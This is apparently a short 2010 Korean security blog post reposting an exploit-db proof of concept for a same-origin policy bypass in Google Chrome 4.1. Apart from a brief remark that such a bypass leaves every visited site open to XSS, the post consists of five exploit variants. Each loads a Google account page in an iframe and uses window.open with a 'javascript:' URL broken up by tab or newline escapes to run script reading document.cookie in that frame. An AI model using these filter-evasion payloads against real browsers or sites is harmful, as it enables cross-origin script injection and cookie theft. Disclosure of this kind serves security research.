Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL
vulnerability/sop 2010. 5. 24. 08:28 |구글 크롬에서 발견된 동일 근원 정책(Same-Origin Policy) 정책 우회 취약점
SOP가 우회되는 브라우저를 사용하게되면 방문하는 모든 사이트가 XSS에 취약하게 된다.
poc는 다음과 같다. (출처:http://www.exploit-db.com/exploits/12657)
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>
'vulnerability > sop' 카테고리의 다른 글
androind chrome sop bypass (0) | 2013.02.18 |
---|---|
브라우저별 domain SOP허용범위 (0) | 2013.02.12 |